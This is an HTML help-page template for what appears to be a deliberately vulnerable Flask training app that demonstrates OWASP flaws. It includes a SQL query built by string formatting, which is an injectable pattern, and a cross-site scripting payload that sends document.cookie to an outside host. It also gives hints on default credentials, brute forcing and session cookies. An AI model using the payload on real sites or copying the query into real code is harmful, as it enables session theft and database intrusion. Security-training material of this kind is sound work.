<!doctype html>
<html class="no-js" lang="en">
    <head>
    {% set title = 'Help' %}
    {% include 'b_head.html' %}
    </head>

    <body>
        <!--[if lt IE 8]>
            <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->

        <div class="auth-wrapper">
            <div class="container-fluid h-100">
                <div class="row flex-row h-100 bg-white">
                    <div class="col-xl-8 col-lg-6 col-md-5 p-0 d-md-block d-lg-block d-sm-none d-none">
                        <div class="lavalite-bg" style="background-image: url('{{ url_for('static', filename='img/auth/login-bg.jpg') }}')">
                            <div class="lavalite-overlay"></div>
                        </div>
                    </div>
                    <div class="col-xl-4 col-lg-6 col-md-7 my-auto p-0">
                        <div class="authentication-form mx-auto">
                            <h3>Demo Selection</h3>
                          <div class="table-responsive">
                                            <table class="table">
                                                <tbody>
                                                    <tr>
                                                        <th scope="row">Injection</th>
														<td>sql = '''SELECT username FROM users WHERE username = '%s' and password = '%s' ''' % (username, password)</td>
                                                    </tr>
                                                    <tr>
                                                        <th scope="row">Broken Authentication</th>
														<td><a href="brokenauth1">Default credentials | Bruteforce (Username: Administrator)</td>
                                                    </tr>
                                                    <tr>
                                                        <th scope="row">Cross Side Scripting Pages</th>
														<td>&#x3C;script&#x3E;
                                                        document.write(&#x27;&#x3C;img src=&#x22;https://domain.se/evilimage?get=&#x27;+escape(document.cookie)+&#x27;&#x22;&#x3E;&#x27;);
                                                        &#x3C;/script&#x3E;</td>
                                                    </tr>
                                                    <tr>
                                                        <th scope="row">Security Misconfiguration</th>
														<td><a href="">Fixed SQL injection, try any way.</td>
                                                    </tr>														
	                                                <tr>
                                                        <th scope="row">Broken Access Control</th>
														<td><a href="">Check User ID in URL</td>
                                                    </tr>	
                                                    <tr>
                                                        <th scope="row">Broken Session</th>
														<td><a href="">Flask does not encrypt cookie content, only signs it.</td>
                                                    </tr>
												
													
                                                </tbody>
                                            </table>
                                            <br>
                                            <p>{{message}}</p>
                                            <p><a href="/resetall"><buttontype="button" class="btn btn-primary"><i class="ik ik-zap"></i>Reset all</button></a> <a href="/select"><buttontype="button" class="btn btn-secondary"><i class="ik ik-arrow-left"></i>Back</button></a> </p>
                                        </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        
    {% include 'b_loginfooter.html' %}	
    </body>
</html>
